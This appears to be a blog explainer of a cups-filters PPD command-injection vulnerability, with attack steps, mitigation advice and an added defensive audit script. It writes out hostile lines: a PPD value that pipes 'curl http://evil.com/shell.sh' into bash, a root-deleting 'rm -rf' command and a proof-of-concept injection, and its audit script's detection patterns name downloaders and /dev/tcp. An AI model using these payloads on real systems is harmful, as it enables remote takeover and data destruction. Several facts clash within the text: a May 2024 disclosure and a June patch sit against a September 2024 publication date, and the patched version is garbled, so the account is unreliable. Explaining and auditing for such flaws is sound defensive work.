CVE-2024-47177 - How Insecure PPD File Parsing in cups-filters Can Lead to Remote Command Execution
In May 2024, a critical vulnerability tracked as CVE-2024-47177 was disclosed in the popular cups-filters project. This flaw, combined with the logic errors described in CVE-2024-47176, can let attackers run commands on your Linux print server, sometimes even from a remote network.
‘cups-filters’ is a widely used set of backends and filters that help CUPS (Common UNIX Printing System) work on non-Mac OS systems. CUPS itself is the backbone of most printing services on Linux. If you run any sort of Linux print server—or even just print from your desktop—this post is for you. We’ll break it all down in plain English, show you how the attack works, and provide relevant links.
What Is CVE-2024-47177?
At its core, CVE-2024-47177 is a command injection bug. This means someone can run their own commands on your server by sneaking code into something the computer expects to be safe. In this case, it all comes down to the way a print job’s PPD (PostScript Printer Description) file is handled.
A field called FoomaticRIPCommandLine in the PPD isn't properly sanitized before being used as a shell command. Because of this, an attacker-controlled PPD file can inject and execute dangerous commands with the same privileges as the CUPS system account—usually lp. If further bugs (like those in CVE-2024-47176) are chained, even remote attackers can exploit this via network print jobs.
Where’s the Issue in the Code?
In real setups, the trouble comes from lines in the foomatic-rip filter—typically found in /usr/lib/cups/filter/foomatic-rip. Here’s a simplified, relevant snippet:
```perl
# In foomatic-rip (Perl script), simplified
my $cmdline = $ppd->{"FoomaticRIPCommandLine"};  # value copied verbatim from the PPD, no validation
# ...
system($cmdline);  # single-string form of system(): the value is handed to /bin/sh, so shell metacharacters are honoured
```
If $ppd->{"FoomaticRIPCommandLine"} is not validated, any value there will be passed straight to your server’s shell and executed. Imagine if that’s:
```sh
lpadmin && rm -rf / --no-preserve-root
```
Now, the FoomaticRIPCommandLine might be set by the server admin—or by a rogue user uploading a crafted PPD. If attackers can submit their own printers, they get code execution.
How is this Exploited?
This bug is especially dangerous for print servers where regular users—or *remote* users—can add or configure printers. Here’s how a typical attack could work:
1. Craft a Malicious PPD File: The attacker creates a printer driver file (PPD) with a specially crafted FoomaticRIPCommandLine field, for example:
```ppd
*FoomaticRIPCommandLine: "|/bin/bash -c 'curl http://evil.com/shell.sh | bash'"
```
2. Upload/Install the Printer: The attacker uses a vulnerability or weak admin policy to upload their printer and assign the PPD file.
3. Trigger the Print Job: When anyone sends a file to this printer, foomatic-rip runs the malicious line as the lp user. If network access is possible, this can all happen remotely. If CVE-2024-47176 (a related logic bug) is present, just submitting a remote print job might be enough.
4. Gain a Shell/Execute a Payload: The print server fetches and runs the attacker's code, often opening a reverse shell.
Here’s a minimal proof-of-concept PPD line that triggers the bug:
```ppd
*FoomaticRIPCommandLine: "| id | tee /tmp/hacked_by_cve47177"
```
When a print job uses this printer, /tmp/hacked_by_cve47177 will contain the user and group info showing that arbitrary shell commands have run.
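To check the queues already on a server for values like the ones above, here is an added audit script (my own example, not code from the original post or from cups-filters) that pulls every FoomaticRIPCommandLine out of the PPDs under /etc/cups/ppd and flags values that look like injected shell rather than a renderer command. The keyword heuristics, the `&&` line-joining and the two sample PPDs are this example's own assumptions.

```python
import re
import sys
from pathlib import Path

# Heuristics (this example's assumption, not a list from the advisory): a genuine
# Foomatic command line is a renderer pipeline (gs, pnm*, foo2*, ...) and has no
# reason to begin with a pipe, download files or hand itself to a shell.
SUSPICIOUS_TOKENS = re.compile(
    r"""(?:^|[\s|;&('"/])(?:curl|wget|nc|ncat|bash|sh|python3?|perl|tee|chmod|base64)\b""")
SHELL_TRICKS = re.compile(r"\$\(|`|/dev/tcp/|\$\{?IFS|>\s*/(?!dev/null)|\bsudo\b")

# Constructed sample PPDs: a plausible Ghostscript line (split with the '&&' +
# newline continuation Foomatic PPDs use) and the proof-of-concept line from the post.
BENIGN_PPD = '''*PPD-Adobe: "4.3"
*FoomaticRIPCommandLine: "gs -q -dBATCH -dSAFER -dNOPAUSE -r%A&&
 -sDEVICE=ljet4 -sOutputFile=- -"
*End
'''
POC_PPD = '''*PPD-Adobe: "4.3"
*FoomaticRIPCommandLine: "| id | tee /tmp/hacked_by_cve47177"
'''

def parse_rip_command_lines(ppd_text: str) -> list:
    """Return every *FoomaticRIPCommandLine value, re-joining '&&'-continued
    lines (assumed here to mirror how foomatic-rip reads them)."""
    joined = ppd_text.replace("&&\n", "")
    return re.findall(r'^\*FoomaticRIPCommandLine:\s*"([^"]*)"', joined, re.M)

def assess(cmdline: str) -> list:
    """Reasons a value looks like injected shell rather than a renderer command."""
    reasons = []
    if cmdline.lstrip().startswith(("|", ";", "&")):
        reasons.append("starts with a pipe or separator instead of a renderer")
    if SUSPICIOUS_TOKENS.search(cmdline):
        reasons.append("invokes a downloader, shell interpreter or file writer")
    if SHELL_TRICKS.search(cmdline):
        reasons.append("uses command substitution, /dev/tcp or redirection")
    return reasons

def audit_ppd(ppd_text: str) -> list:
    """(command line, reasons) pairs for each suspicious value in one PPD."""
    return [(c, assess(c)) for c in parse_rip_command_lines(ppd_text) if assess(c)]

if __name__ == "__main__":
    # CUPS keeps one PPD per queue in /etc/cups/ppd; pass another directory to override.
    for path in sorted(Path(sys.argv[1] if len(sys.argv) > 1 else "/etc/cups/ppd").glob("*.ppd")):
        for cmd, reasons in audit_ppd(path.read_text(errors="replace")):
            print(f"{path}: {cmd!r}: {'; '.join(reasons)}")
```

A hit is a reason to inspect the queue and its PPD's origin, not proof of compromise; a clean run only means the queues use renderer-looking command lines, so patching remains the fix.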
References
- CVE-2024-47177 on NIST
- CUPS Project
- cups-filters GitHub
- Debian Security Advisory for cups-filters (DSA 5702-1)
- Original cups-filters commit fixing the issue
- Mitre CVE Entry
1. Update cups-filters to the latest patched version (*2.. or newer as of June 2024*).
2. Block untrusted printer drivers and PPDs on your server—don't allow users to upload arbitrary files!
Summary
CVE-2024-47177 is a critical reminder that printer software isn’t just for offices and teachers—it’s a real attack vector for hackers. If you use Linux for printing (using CUPS and cups-filters), check your systems and patch immediately.
As always: Update, limit user access, and don’t trust anything that gets parsed into a shell command! The fate of your print jobs—and perhaps your entire server—depends on it.
Stay safe! For any questions, check the original security advisory or your distribution’s update notes.
Timeline
Published on: 09/26/2024 22:15:04 UTC
Last modified on: 09/30/2024 12:46:20 UTC